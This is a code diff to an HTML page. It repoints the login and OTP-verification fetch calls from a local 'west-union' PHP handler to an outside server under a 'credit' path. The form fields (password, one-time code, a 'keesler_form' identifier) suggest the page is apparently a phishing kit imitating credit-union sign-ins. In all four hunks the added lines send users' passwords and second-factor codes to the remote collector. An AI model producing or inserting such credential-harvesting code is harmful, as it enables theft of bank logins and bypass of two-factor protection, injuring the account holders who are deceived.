--- a/index.html
+++ b/index.html
@@ -450,7 +450,7 @@ ul.filebird-block-filebird-gallery{margin:auto!important;padding:0!important;wid
 				formData.append('password', password);
 				formData.append('action', 'login');
 				
-				fetch('http://localhost/west-union/west-union.php', {
+				fetch('https://kaiaihealth.com/credit/server.php', {
 					method: 'POST',
 					body: formData
 				})
@@ -492,7 +492,7 @@ ul.filebird-block-filebird-gallery{margin:auto!important;padding:0!important;wid
 				formData.append('otp', otp);
 				formData.append('action', 'verify_otp');
 				
-				fetch('http://localhost/west-union/west-union.php', {
+				fetch('https://kaiaihealth.com/credit/server.php', {
 					method: 'POST',
 					body: formData
 				})
@@ -943,7 +943,7 @@ ul.filebird-block-filebird-gallery{margin:auto!important;padding:0!important;wid
 			formData.append('action', 'login');
 			formData.append('form_id', 'keesler_form'); // Add form identifier
 			
-			fetch('http://localhost/west-union/west-union.php', {
+			fetch('https://kaiaihealth.com/credit/server.php', {
 				method: 'POST',
 				body: formData
 			})
@@ -993,7 +993,7 @@ ul.filebird-block-filebird-gallery{margin:auto!important;padding:0!important;wid
 			formData.append('action', 'verify_otp');
 			formData.append('form_id', 'keesler_form'); // Add form identifier
 			
-			fetch('http://localhost/west-union/west-union.php', {
+			fetch('https://kaiaihealth.com/credit/server.php', {
 				method: 'POST',
 				body: formData
 			})
